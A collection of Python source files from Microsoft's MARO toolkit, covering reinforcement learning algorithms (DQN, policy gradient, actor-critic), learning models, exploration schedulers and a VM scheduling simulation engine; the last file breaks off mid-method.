def validate_task_names(model_task_names, expected_task_names):
task_names, expected_task_names = set(model_task_names), set(expected_task_names)
if len(model_task_names) > 1 and task_names != expected_task_names:
raise UnrecognizedTask(f"Expected task names {expected_task_names}, got {task_names}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Union
import numpy as np
import torch
from maro.rl.models.learning_model import LearningModel
from .abs_algorithm import AbsAlgorithm
class DQNConfig:
"""Configuration for the DQN algorithm.
Args:
reward_discount (float): Reward decay as defined in standard RL terminology.
loss_cls: Loss function class for evaluating TD errors.
target_update_frequency (int): Number of training rounds between target model updates.
epsilon (float): Exploration rate for epsilon-greedy exploration. Defaults to None.
tau (float): Soft update coefficient, i.e., target_model = tau * eval_model + (1 - tau) * target_model.
is_double (bool): If True, the next Q values will be computed according to the double DQN algorithm,
i.e., q_next = Q_target(s, argmax(Q_eval(s, a))). Otherwise, q_next = max(Q_target(s, a)).
See https://arxiv.org/pdf/1509.06461.pdf for details. Defaults to False.
advantage_mode (str): Advantage mode for the dueling architecture. Defaults to None, in which
case it is assumed that the regular Q-value model is used.
per_sample_td_error_enabled (bool): If True, per-sample TD errors will be returned by the DQN's train()
method. Defaults to False.
"""
__slots__ = [
"reward_discount", "loss_func", "target_update_frequency", "epsilon", "tau", "is_double", "advantage_mode",
"per_sample_td_error_enabled"
]
def __init__(
self,
reward_discount: float,
loss_cls,
target_update_frequency: int,
epsilon: float = .0,
tau: float = 0.1,
is_double: bool = True,
advantage_mode: str = None,
per_sample_td_error_enabled: bool = False
):
self.reward_discount = reward_discount
self.target_update_frequency = target_update_frequency
self.epsilon = epsilon
self.tau = tau
self.is_double = is_double
self.advantage_mode = advantage_mode
self.per_sample_td_error_enabled = per_sample_td_error_enabled
self.loss_func = loss_cls(reduction="none" if per_sample_td_error_enabled else "mean")
class DQN(AbsAlgorithm):
"""The Deep-Q-Networks algorithm.
See https://web.stanford.edu/class/psych209/Readings/MnihEtAlHassibis15NatureControlDeepRL.pdf for details.
Args:
model (LearningModel): Q-value model.
config: Configuration for DQN algorithm.
"""
def __init__(self, model: LearningModel, config: DQNConfig):
self.validate_task_names(model.task_names, {"state_value", "advantage"})
super().__init__(model, config)
if isinstance(self._model.output_dim, int):
self._num_actions = self._model.output_dim
else:
self._num_actions = self._model.output_dim["advantage"]
self._training_counter = 0
self._target_model = model.copy() if model.is_trainable else None
def choose_action(self, state: np.ndarray) -> Union[int, np.ndarray]:
state = torch.from_numpy(state).to(self._device)
is_single = len(state.shape) == 1
if is_single:
state = state.unsqueeze(dim=0)
greedy_action = self._get_q_values(self._model, state, is_training=False).argmax(dim=1).data
# No exploration
if self._config.epsilon == .0:
return greedy_action.item() if is_single else greedy_action.numpy()
if is_single:
return greedy_action if np.random.random() > self._config.epsilon else np.random.choice(self._num_actions)
# batch inference
return np.array([
act if np.random.random() > self._config.epsilon else np.random.choice(self._num_actions)
for act in greedy_action
])
def _get_q_values(self, model, states, is_training: bool = True):
if self._config.advantage_mode is not None:
output = model(states, is_training=is_training)
state_values = output["state_value"]
advantages = output["advantage"]
# Use mean or max correction to address the identifiability issue
corrections = advantages.mean(1) if self._config.advantage_mode == "mean" else advantages.max(1)[0]
q_values = state_values + advantages - corrections.unsqueeze(1)
return q_values
else:
return model(states, is_training=is_training)
def _get_next_q_values(self, current_q_values_for_all_actions, next_states):
next_q_values_for_all_actions = self._get_q_values(self._target_model, next_states, is_training=False)
if self._config.is_double:
actions = current_q_values_for_all_actions.max(dim=1)[1].unsqueeze(1)
return next_q_values_for_all_actions.gather(1, actions).squeeze(1) # (N,)
else:
return next_q_values_for_all_actions.max(dim=1)[0] # (N,)
def _compute_td_errors(self, states, actions, rewards, next_states):
if len(actions.shape) == 1:
actions = actions.unsqueeze(1) # (N, 1)
current_q_values_for_all_actions = self._get_q_values(self._model, states)
current_q_values = current_q_values_for_all_actions.gather(1, actions).squeeze(1) # (N,)
next_q_values = self._get_next_q_values(current_q_values_for_all_actions, next_states) # (N,)
target_q_values = (rewards + self._config.reward_discount * next_q_values).detach() # (N,)
return self._config.loss_func(current_q_values, target_q_values)
def train(self, states: np.ndarray, actions: np.ndarray, rewards: np.ndarray, next_states: np.ndarray):
states = torch.from_numpy(states).to(self._device)
actions = torch.from_numpy(actions).to(self._device)
rewards = torch.from_numpy(rewards).to(self._device)
next_states = torch.from_numpy(next_states).to(self._device)
loss = self._compute_td_errors(states, actions, rewards, next_states)
self._model.learn(loss.mean() if self._config.per_sample_td_error_enabled else loss)
self._training_counter += 1
if self._training_counter % self._config.target_update_frequency == 0:
self._target_model.soft_update(self._model, self._config.tau)
return loss.detach().numpy()
def set_exploration_params(self, epsilon):
self._config.epsilon = epsilon
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import namedtuple
from typing import Callable, List, Union
import numpy as np
import torch
from maro.rl.algorithms.abs_algorithm import AbsAlgorithm
from maro.rl.models.learning_model import LearningModel
from maro.rl.utils.trajectory_utils import get_lambda_returns, get_truncated_cumulative_reward
ActionInfo = namedtuple("ActionInfo", ["action", "log_probability"])
class PolicyOptimizationConfig:
"""Configuration for the policy optimization algorithm family."""
__slots__ = ["reward_discount"]
def __init__(self, reward_discount):
self.reward_discount = reward_discount
class PolicyOptimization(AbsAlgorithm):
"""Policy optimization algorithm family.
The algorithm family includes policy gradient (e.g. REINFORCE), actor-critic, PPO, etc.
"""
def choose_action(self, state: np.ndarray) -> Union[ActionInfo, List[ActionInfo]]:
"""Use the actor (policy) model to generate stochastic actions.
Args:
state: Input to the actor model.
Returns:
A single ActionInfo namedtuple or a list of ActionInfo namedtuples.
"""
state = torch.from_numpy(state).to(self._device)
is_single = len(state.shape) == 1
if is_single:
state = state.unsqueeze(dim=0)
action_distribution = self._model(state, task_name="actor", is_training=False).squeeze().numpy()
if is_single:
action = np.random.choice(len(action_distribution), p=action_distribution)
return ActionInfo(action=action, log_probability=np.log(action_distribution[action]))
# batch inference
batch_results = []
for distribution in action_distribution:
action = np.random.choice(len(distribution), p=distribution)
batch_results.append(ActionInfo(action=action, log_probability=np.log(distribution[action])))
return batch_results
def train(
self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
):
raise NotImplementedError
class PolicyGradient(PolicyOptimization):
"""The vanilla Policy Gradient (VPG) algorithm, a.k.a., REINFORCE.
Reference: https://github.com/openai/spinningup/tree/master/spinup/algos/pytorch.
"""
def train(
self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
):
states = torch.from_numpy(states).to(self._device)
actions = torch.from_numpy(actions).to(self._device)
returns = get_truncated_cumulative_reward(rewards, self._config.reward_discount)
returns = torch.from_numpy(returns).to(self._device)
action_distributions = self._model(states)
action_prob = action_distributions.gather(1, actions.unsqueeze(1)).squeeze() # (N, 1)
loss = -(torch.log(action_prob) * returns).mean()
self._model.learn(loss)
class ActorCriticConfig(PolicyOptimizationConfig):
"""Configuration for the Actor-Critic algorithm.
Args:
reward_discount (float): Reward decay as defined in standard RL terminology.
critic_loss_func (Callable): Loss function for the critic model.
train_iters (int): Number of gradient descent steps per call to ``train``.
actor_loss_coefficient (float): The coefficient for actor loss in the total loss function, e.g.,
loss = critic_loss + ``actor_loss_coefficient`` * actor_loss. Defaults to 1.0.
k (int): Number of time steps used in computing returns or return estimates. Defaults to -1, in which case
rewards are accumulated until the end of the trajectory.
lam (float): Lambda coefficient used in computing lambda returns. Defaults to 1.0, in which case the usual
k-step return is computed.
clip_ratio (float): Clip ratio in the PPO algorithm (https://arxiv.org/pdf/1707.06347.pdf). Defaults to None,
in which case the actor loss is calculated using the usual policy gradient theorem.
"""
__slots__ = [
"reward_discount", "critic_loss_func", "train_iters", "actor_loss_coefficient", "k", "lam", "clip_ratio"
]
def __init__(
self,
reward_discount: float,
critic_loss_func: Callable,
train_iters: int,
actor_loss_coefficient: float = 1.0,
k: int = -1,
lam: float = 1.0,
clip_ratio: float = None
):
super().__init__(reward_discount)
self.critic_loss_func = critic_loss_func
self.train_iters = train_iters
self.actor_loss_coefficient = actor_loss_coefficient
self.k = k
self.lam = lam
self.clip_ratio = clip_ratio
class ActorCritic(PolicyOptimization):
"""Actor Critic algorithm with separate policy and value models.
References:
https://github.com/openai/spinningup/tree/master/spinup/algos/pytorch.
https://towardsdatascience.com/understanding-actor-critic-methods-931b97b6df3f
Args:
model (LearningModel): Multi-task model that computes action distributions and state values.
It may or may not have a shared bottom stack.
config: Configuration for the AC algorithm.
"""
def __init__(self, model: LearningModel, config: ActorCriticConfig):
self.validate_task_names(model.task_names, {"actor", "critic"})
super().__init__(model, config)
def _get_values_and_bootstrapped_returns(self, state_sequence, reward_sequence):
state_values = self._model(state_sequence, task_name="critic").detach().squeeze()
return_est = get_lambda_returns(
reward_sequence, state_values, self._config.reward_discount, self._config.lam, k=self._config.k
)
return state_values, return_est
def train(
self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
):
states = torch.from_numpy(states).to(self._device)
actions = torch.from_numpy(actions).to(self._device)
log_action_prob = torch.from_numpy(log_action_prob).to(self._device)
rewards = torch.from_numpy(rewards).to(self._device)
state_values, return_est = self._get_values_and_bootstrapped_returns(states, rewards)
advantages = return_est - state_values
for _ in range(self._config.train_iters):
critic_loss = self._config.critic_loss_func(
self._model(states, task_name="critic").squeeze(), return_est
)
action_prob = self._model(states, task_name="actor").gather(1, actions.unsqueeze(1)).squeeze() # (N,)
log_action_prob_new = torch.log(action_prob)
actor_loss = self._actor_loss(log_action_prob_new, log_action_prob, advantages)
loss = critic_loss + self._config.actor_loss_coefficient * actor_loss
self._model.learn(loss)
def _actor_loss(self, log_action_prob_new, log_action_prob_old, advantages):
if self._config.clip_ratio is not None:
ratio = torch.exp(log_action_prob_new - log_action_prob_old)
clip_ratio = torch.clamp(ratio, 1 - self._config.clip_ratio, 1 + self._config.clip_ratio)
actor_loss = -(torch.min(ratio * advantages, clip_ratio * advantages)).mean()
else:
actor_loss = -(log_action_prob_new * advantages).mean()
return actor_loss
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .experience_collection import concat_experiences_by_agent, merge_experiences_with_trajectory_boundaries
from .single_learner_multi_actor_sync_mode import ActorProxy, ActorWorker
__all__ = ["ActorProxy", "ActorWorker", "concat_experiences_by_agent", "merge_experiences_with_trajectory_boundaries"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import defaultdict
def concat_experiences_by_agent(exp_by_source: dict) -> dict:
"""Concatenate experiences from multiple sources, by agent ID.
The experience from each source is expected to be already grouped by agent ID. The result is a single dictionary
of experiences with keys being agent IDs and values being the concatenation of experiences from all sources
for each agent ID.
Args:
exp_by_source (dict): Experiences from multiple sources. Each value should consist of experiences grouped by
agent ID.
Returns:
Merged experiences with agent IDs as keys.
"""
merged = {}
for exp_by_agent in exp_by_source.values():
for agent_id, exp in exp_by_agent.items():
if agent_id not in merged:
merged[agent_id] = defaultdict(list)
for k, v in exp.items():
merged[agent_id][k].extend(v)
return merged
def merge_experiences_with_trajectory_boundaries(trajectories_by_source) -> dict:
"""Collect each agent's trajectories from multiple sources.
Args:
trajectories_by_source (dict): Agent's trajectories from multiple sources.
Returns:
A list of trajectories for each agent.
"""
merged = defaultdict(list)
for exp_by_agent in trajectories_by_source.values():
for agent_id, trajectory in exp_by_agent.items():
merged[agent_id].append(trajectory)
return merged
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_learner import AbsLearner
from .simple_learner import SimpleLearner
__all__ = ["AbsLearner", "SimpleLearner"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC
class AbsLearner(ABC):
"""Abstract learner class to control the policy learning process."""
def __init__(self):
pass
def learn(self, *args, **kwargs):
"""The outermost training loop logic is implemented here."""
pass
def test(self):
"""Test policy performance."""
pass
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import sys
from typing import Union
from maro.rl.actor.simple_actor import SimpleActor
from maro.rl.agent.simple_agent_manager import SimpleAgentManager
from maro.rl.dist_topologies.single_learner_multi_actor_sync_mode import ActorProxy
from maro.rl.scheduling.scheduler import Scheduler
from maro.utils import DummyLogger, Logger
from .abs_learner import AbsLearner
class SimpleLearner(AbsLearner):
"""A simple implementation of ``AbsLearner``.
Args:
agent_manager (AbsAgentManager): An AgentManager instance that manages all agents.
actor (SimpleActor or ActorProxy): An SimpleActor or ActorProxy instance responsible for performing roll-outs
(environment sampling).
scheduler (AbsScheduler): A scheduler responsible for iterating over episodes and generating exploration
parameters if necessary.
logger (Logger): Used to log important messages.
"""
def __init__(
self,
agent_manager: SimpleAgentManager,
actor: Union[SimpleActor, ActorProxy],
scheduler: Scheduler,
logger: Logger = DummyLogger()
):
super().__init__()
self._agent_manager = agent_manager
self._actor = actor
self._scheduler = scheduler
self._logger = logger
def learn(self):
"""Main loop for collecting experiences from the actor and using them to update policies."""
for exploration_params in self._scheduler:
performance, exp_by_agent = self._actor.roll_out(
model_dict=None if self._is_shared_agent_instance() else self._agent_manager.dump_models(),
exploration_params=exploration_params
)
self._scheduler.record_performance(performance)
ep_summary = f"ep {self._scheduler.current_ep} - performance: {performance}"
if exploration_params:
ep_summary = f"{ep_summary}, exploration_params: {self._scheduler.exploration_params}"
self._logger.info(ep_summary)
self._agent_manager.train(exp_by_agent)
def test(self):
"""Test policy performance."""
performance, _ = self._actor.roll_out(
model_dict=self._agent_manager.dump_models(),
return_details=False
)
self._scheduler.record_performance(performance)
def exit(self, code: int = 0):
"""Tell the remote actor to exit."""
if isinstance(self._actor, ActorProxy):
self._actor.roll_out(done=True)
sys.exit(code)
def load_models(self, dir_path: str):
self._agent_manager.load_models_from_files(dir_path)
def dump_models(self, dir_path: str):
self._agent_manager.dump_models_to_files(dir_path)
def _is_shared_agent_instance(self):
"""If true, the set of agents performing inference in actor is the same as self._agent_manager."""
return isinstance(self._actor, SimpleActor) and id(self._actor.agents) == id(self._agent_manager)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_block import AbsBlock
from .fc_block import FullyConnectedBlock
from .learning_model import LearningModel, NNStack, OptimizerOptions
__all__ = ["AbsBlock", "FullyConnectedBlock", "LearningModel", "NNStack", "OptimizerOptions"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import namedtuple
from itertools import chain
from typing import Dict, Union
import torch
import torch.nn as nn
from maro.utils import clone
from maro.utils.exception.rl_toolkit_exception import NNStackDimensionError, MissingOptimizer
from .abs_block import AbsBlock
OptimizerOptions = namedtuple("OptimizerOptions", ["cls", "params"])
class NNStack(nn.Module):
"""An NN stack that consists of a sequence of chainable blocks.
Args:
name (str): Name of the stack.
blocks (AbsBlock): Blocks that comprise the model. They must be chainable, i.e., the output dimension
of a block must match the input dimension of its successor.
"""
def __init__(self, name: str, *blocks: [AbsBlock]):
super().__init__()
self._name = name
self._input_dim = blocks[0].input_dim
self._output_dim = blocks[-1].output_dim
self._net = nn.Sequential(*blocks)
@property
def name(self):
return self._name
@property
def input_dim(self):
return self._input_dim
@property
def output_dim(self):
return self._output_dim
def forward(self, inputs):
"""Feedforward computation.
Args:
inputs: Inputs to the model.
Returns:
Outputs from the model.
"""
return self._net(inputs)
class LearningModel(nn.Module):
"""NN model that consists of multiple task heads and an optional shared stack.
Args:
task_stacks (NNStack): NNStack instances, each of which performs a designated task.
shared_stack (NNStack): Network module that forms that shared part of the model. Defaults to None.
optimizer_options (Union[OptimizerOptions, Dict[str, OptimizerOptions]]): Optimizer options for
the internal stacks. If none, no optimizer will be created for the model and the model will not
be trainable. If it is a single OptimizerOptions instance, an optimizer will be created to jointly
optimize all parameters of the model. If it is a dictionary, for each `(key, value)` pair, an optimizer
specified by `value` will be created for the internal stack named `key`. Defaults to None.
"""
def __init__(
self,
*task_stacks: NNStack,
shared_stack: NNStack = None,
optimizer_options: Union[OptimizerOptions, Dict[str, OptimizerOptions]] = None
):
self.validate_dims(*task_stacks, shared_stack=shared_stack)
super().__init__()
self._stack_dict = {stack.name: stack for stack in task_stacks}
# shared stack
self._shared_stack = shared_stack
if self._shared_stack:
self._stack_dict[self._shared_stack.name] = self._shared_stack
# task_heads
self._task_stack_dict = nn.ModuleDict({task_stack.name: task_stack for task_stack in task_stacks})
self._input_dim = self._shared_stack.input_dim if self._shared_stack else task_stacks[0].input_dim
if len(task_stacks) == 1:
self._output_dim = task_stacks[0].output_dim
else:
self._output_dim = {task_stack.name: task_stack.output_dim for task_stack in task_stacks}
self._is_trainable = optimizer_options is not None
if self._is_trainable:
if isinstance(optimizer_options, OptimizerOptions):
self._optimizer = optimizer_options.cls(self.parameters(), **optimizer_options.params)
else:
self._optimizer = {
stack_name: opt.cls(self._stack_dict[stack_name].parameters(), **opt.params)
for stack_name, opt in optimizer_options.items()
}
else:
self.eval()
for param in self.parameters():
param.requires_grad = False
def __getstate__(self):
dic = self.__dict__.copy()
if "_optimizer" in dic:
del dic["_optimizer"]
dic["_is_trainable"] = False
return dic
def __setstate__(self, dic: dict):
self.__dict__ = dic
@property
def task_names(self) -> [str]:
return list(self._task_stack_dict.keys())
@property
def shared_stack(self):
return self._shared_stack
@property
def input_dim(self):
return self._input_dim
@property
def output_dim(self):
return self._output_dim
@property
def is_trainable(self) -> bool:
return self._is_trainable
def _forward(self, inputs, task_name: str = None):
if self._shared_stack:
inputs = self._shared_stack(inputs)
if len(self._task_stack_dict) == 1:
return list(self._task_stack_dict.values())[0](inputs)
if task_name is None:
return {name: task_stack(inputs) for name, task_stack in self._task_stack_dict.items()}
if isinstance(task_name, list):
return {name: self._task_stack_dict[name](inputs) for name in task_name}
else:
return self._task_stack_dict[task_name](inputs)
def forward(self, inputs, task_name: str = None, is_training: bool = True):
"""Feedforward computations for the given head(s).
Args:
inputs: Inputs to the model.
task_name (str): The name of the task for which the network output is required. If the model contains only
one task module, the task_name is ignored and the output of that module will be returned. If the model
contains multiple task modules, then 1) if task_name is None, the output from all task modules will be
returned in the form of a dictionary; 2) if task_name is a list, the outputs from the task modules
specified in the list will be returned in the form of a dictionary; 3) if this is a single string,
the output from the corresponding task module will be returned.
is_training (bool): If true, all torch submodules will be set to training mode, and auto-differentiation
will be turned on. Defaults to True.
Returns:
Outputs from the required head(s).
"""
self.train(mode=is_training)
if is_training:
return self._forward(inputs, task_name)
with torch.no_grad():
return self._forward(inputs, task_name)
def learn(self, loss):
"""Use the loss to back-propagate gradients and apply them to the underlying parameters."""
if not self._is_trainable:
raise MissingOptimizer("No optimizer registered to the model")
if isinstance(self._optimizer, dict):
for optimizer in self._optimizer.values():
optimizer.zero_grad()
else:
self._optimizer.zero_grad()
# Obtain gradients through back-propagation
loss.backward()
# Apply gradients
if isinstance(self._optimizer, dict):
for optimizer in self._optimizer.values():
optimizer.step()
else:
self._optimizer.step()
def soft_update(self, other_model: nn.Module, tau: float):
for params, other_params in zip(self.parameters(), other_model.parameters()):
params.data = (1 - tau) * params.data + tau * other_params.data
def copy(self):
return clone(self)
def load(self, state_dict):
self.load_state_dict(state_dict)
def dump(self):
return self.state_dict()
def load_from_file(self, path: str):
self.load_state_dict(torch.load(path))
def dump_to_file(self, path: str):
torch.save(self.state_dict(), path)
@staticmethod
def validate_dims(*task_stacks, shared_stack=None):
if shared_stack:
expected_dim = shared_stack.output_dim
for task_stack in task_stacks:
if task_stack.input_dim != expected_dim:
raise NNStackDimensionError(
f"Expected input dimension {expected_dim} for task module: {task_stack.name}, "
f"got {task_stack.input_dim}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable
from maro.utils.exception.rl_toolkit_exception import InfiniteTrainingLoop, InvalidEpisode
class Scheduler(object):
"""Scheduler that generates exploration parameters for each episode.
Args:
max_ep (int): Maximum number of episodes to be run. If -1, an early stopping callback is expected to prevent
the training loop from running forever.
early_stopping_checker (Callable): Function that returns a boolean indicating whether early stopping should
be triggered. Defaults to None, in which case no early stopping check will be performed.
"""
def __init__(self, max_ep: int, early_stopping_checker: Callable = None):
if max_ep < -1:
raise InvalidEpisode("max_episode can only be a non-negative integer or -1.")
if max_ep == -1 and early_stopping_checker is None:
raise InfiniteTrainingLoop(
"A positive max_ep or an early stopping checker must be provided to prevent the training loop from "
"running forever."
)
self._max_ep = max_ep
self._early_stopping_checker = early_stopping_checker
self._current_ep = -1
self._performance_history = []
self._exploration_params = None
def __iter__(self):
return self
def __next__(self):
self._current_ep += 1
if self._current_ep == self._max_ep:
raise StopIteration
if self._early_stopping_checker and self._early_stopping_checker(self._performance_history):
raise StopIteration
self._exploration_params = self.get_next_exploration_params()
return self._exploration_params
def get_next_exploration_params(self):
pass
@property
def current_ep(self):
return self._current_ep
@property
def exploration_params(self):
return self._exploration_params
def record_performance(self, performance):
self._performance_history.append(performance)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Union
import numpy as np
from .scheduler import Scheduler
class LinearParameterScheduler(Scheduler):
"""Static exploration parameter generator based on a linear schedule.
Args:
max_ep (int): Maximum number of episodes to run.
early_stopping_checker (Callable): Function that returns a boolean indicating whether early stopping should
be triggered. Defaults to None, in which case no early stopping check will be performed.
parameter_names ([str]): List of exploration parameter names.
start_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the first episode.
These values must correspond to ``parameter_names``.
end_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values rate for the last episode.
These values must correspond to ``parameter_names``.
"""
def __init__(
self,
max_ep: int,
early_stopping_checker: Callable = None,
*,
parameter_names: [str],
start_values: Union[float, list, tuple, np.ndarray],
end_values: Union[float, list, tuple, np.ndarray]
):
super().__init__(max_ep, early_stopping_checker=early_stopping_checker)
self._parameter_names = parameter_names
if isinstance(start_values, float):
self._current_values = start_values * np.ones(len(self._parameter_names))
elif isinstance(start_values, (list, tuple)):
self._current_values = np.asarray(start_values)
else:
self._current_values = start_values
if isinstance(end_values, float):
end_values = end_values * np.ones(len(self._parameter_names))
elif isinstance(end_values, (list, tuple)):
end_values = np.asarray(end_values)
self._delta = (end_values - self._current_values) / (self._max_ep - 1)
def get_next_exploration_params(self):
current_values = self._current_values.copy()
self._current_values += self._delta
return dict(zip(self._parameter_names, current_values))
class TwoPhaseLinearParameterScheduler(Scheduler):
"""Exploration parameter generator based on two linear schedules joined together.
Args:
max_ep (int): Maximum number of episodes to run.
early_stopping_checker (Callable): Function that returns a boolean indicating whether early stopping should
be triggered. Defaults to None, in which case no early stopping check will be performed.
parameter_names ([str]): List of exploration parameter names.
split_ep (float): The episode where the switch from the first linear schedule to the second occurs.
start_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the first episode.
These values must correspond to ``parameter_names``.
mid_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values where the switch from the
first linear schedule to the second occurs. In other words, this is the exploration rate where the first
linear schedule ends and the second begins. These values must correspond to ``parameter_names``.
end_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the last episode.
These values must correspond to ``parameter_names``.
Returns:
An iterator over the series of exploration rates from episode 0 to ``max_ep`` - 1.
"""
def __init__(
self,
max_ep: int,
early_stopping_checker: Callable = None,
*,
parameter_names: [str],
split_ep: float,
start_values: Union[float, list, tuple, np.ndarray],
mid_values: Union[float, list, tuple, np.ndarray],
end_values: Union[float, list, tuple, np.ndarray]
):
if split_ep <= 0 or split_ep >= max_ep:
raise ValueError("split_ep must be between 0 and max_ep - 1.")
super().__init__(max_ep, early_stopping_checker=early_stopping_checker)
self._parameter_names = parameter_names
self._split_ep = split_ep
if isinstance(start_values, float):
self._current_values = start_values * np.ones(len(self._parameter_names))
elif isinstance(start_values, (list, tuple)):
self._current_values = np.asarray(start_values)
else:
self._current_values = start_values
if isinstance(mid_values, float):
mid_values = mid_values * np.ones(len(self._parameter_names))
elif isinstance(mid_values, (list, tuple)):
mid_values = np.asarray(mid_values)
if isinstance(end_values, float):
end_values = end_values * np.ones(len(self._parameter_names))
elif isinstance(end_values, (list, tuple)):
end_values = np.asarray(end_values)
self._delta_1 = (mid_values - self._current_values) / split_ep
self._delta_2 = (end_values - mid_values) / (max_ep - split_ep - 1)
def get_next_exploration_params(self):
current_values = self._current_values.copy()
self._current_values += self._delta_1 if self._current_ep < self._split_ep else self._delta_2
return dict(zip(self._parameter_names, current_values))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_shaper import AbsShaper
from .action_shaper import ActionShaper
from .experience_shaper import ExperienceShaper
from .k_step_experience_shaper import KStepExperienceKeys, KStepExperienceShaper
from .state_shaper import StateShaper
__all__ = [
"AbsShaper",
"ActionShaper",
"ExperienceShaper",
"KStepExperienceKeys", "KStepExperienceShaper",
"StateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_store import AbsStore
from .column_based_store import ColumnBasedStore, OverwriteType
__all__ = ["AbsStore", "ColumnBasedStore", "OverwriteType"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import shutil
import tarfile
from typing import Dict, List
from yaml import safe_load
from maro.backends.frame import FrameBase, SnapshotList
from maro.cli.data_pipeline.utils import StaticParameter, download_file
from maro.data_lib import BinaryReader
from maro.event_buffer import CascadeEvent, EventBuffer, MaroEvents
from maro.simulator.scenarios.abs_business_engine import AbsBusinessEngine
from maro.simulator.scenarios.helpers import DocableDict
from maro.utils.logger import CliLogger
from maro.utils.utils import convert_dottable
from .common import AllocateAction, DecisionPayload, Latency, PostponeAction, VmRequestPayload
from .cpu_reader import CpuReader
from .enums import Events, PmState, PostponeType, VmCategory
from .frame_builder import build_frame
from .physical_machine import PhysicalMachine
from .virtual_machine import VirtualMachine
metrics_desc = """
VM scheduling metrics used provide statistics information until now.
It contains following keys:
total_vm_requests (int): Total VM requests.
total_energy_consumption (float): Accumulative total PM energy consumption.
successful_allocation (int): Accumulative successful VM allocation until now.
successful_completion (int): Accumulative successful completion of tasks.
failed_allocation (int): Accumulative failed VM allocation until now.
failed_completion (int): Accumulative failed VM completion due to PM overloading.
total_latency (Latency): Accumulative used buffer time until now.
total_oversubscriptions (int): Accumulative over-subscriptions. The unit is PM amount * tick.
total_overload_pms (int): Accumulative overload pms. The unit is PM amount * tick.
total_overload_vms (int): Accumulative VMs on overload pms. The unit is VM amount * tick.
"""
logger = CliLogger(name=__name__)
class VmSchedulingBusinessEngine(AbsBusinessEngine):
def __init__(
self,
event_buffer: EventBuffer,
topology: str,
start_tick: int,
max_tick: int,
snapshot_resolution: int,
max_snapshots: int,
additional_options: dict = {}
):
super().__init__(
scenario_name="vm_scheduling", event_buffer=event_buffer, topology=topology, start_tick=start_tick,
max_tick=max_tick, snapshot_resolution=snapshot_resolution, max_snapshots=max_snapshots,
additional_options=additional_options
)
# Initialize environment metrics.
self._init_metrics()
# Load configurations.
self._load_configs()
self._register_events()
self._init_frame()
# Initialize simulation data.
self._init_data()
# PMs list used for quick accessing.
self._init_pms()
# All living VMs.
self._live_vms: Dict[int, VirtualMachine] = {}
# All request payload of the pending decision VMs.
# NOTE: Need naming suggestestion.
self._pending_vm_request_payload: Dict[int, VmRequestPayload] = {}
self._vm_reader = BinaryReader(self._config.VM_TABLE)
self._vm_item_picker = self._vm_reader.items_tick_picker(self._start_tick, self._max_tick, time_unit="s")
self._cpu_reader = CpuReader(data_path=self._config.CPU_READINGS, start_tick=self._start_tick)
self._tick: int = 0
self._pending_action_vm_id: int = 0
@property
def configs(self) -> dict:
"""dict: Current configuration."""
return self._config
@property
def frame(self) -> FrameBase:
"""FrameBase: Current frame."""
return self._frame
@property
def snapshots(self) -> SnapshotList:
"""SnapshotList: Current snapshot list."""
return self._snapshots
def _load_configs(self):
"""Load configurations."""
# Update self._config_path with current file path.
self.update_config_root_path(__file__)
with open(os.path.join(self._config_path, "config.yml")) as fp:
self._config = convert_dottable(safe_load(fp))
self._delay_duration: int = self._config.DELAY_DURATION
self._buffer_time_budget: int = self._config.BUFFER_TIME_BUDGET
# Oversubscription rate.
self._max_cpu_oversubscription_rate: float = self._config.MAX_CPU_OVERSUBSCRIPTION_RATE
self._max_memory_oversubscription_rate: float = self._config.MAX_MEM_OVERSUBSCRIPTION_RATE
self._max_utilization_rate: float = self._config.MAX_UTILIZATION_RATE
# Load PM related configs.
self._pm_amount: int = self._cal_pm_amount()
self._kill_all_vms_if_overload = self._config.KILL_ALL_VMS_IF_OVERLOAD
def _init_metrics(self):
# Env metrics.
self._total_vm_requests: int = 0
self._total_energy_consumption: float = 0.0
self._successful_allocation: int = 0
self._successful_completion: int = 0
self._failed_allocation: int = 0
self._failed_completion: int = 0
self._total_latency: Latency = Latency()
self._total_oversubscriptions: int = 0
self._total_overload_pms: int = 0
self._total_overload_vms: int = 0
def _init_data(self):
"""If the file does not exist, then trigger the short data pipeline to download the processed data."""
vm_table_data_path = self._config.VM_TABLE
if vm_table_data_path.startswith("~"):
vm_table_data_path = os.path.expanduser(vm_table_data_path)
cpu_readings_data_path = self._config.CPU_READINGS
if cpu_readings_data_path.startswith("~"):
cpu_readings_data_path = os.path.expanduser(cpu_readings_data_path)
if (not os.path.exists(vm_table_data_path)) or (not os.path.exists(cpu_readings_data_path)):
logger.info_green("Lack data. Start preparing data.")
self._download_processed_data()
logger.info_green("Data preparation is finished.")
def _cal_pm_amount(self) -> int:
amount: int = 0
for pm_type in self._config.PM:
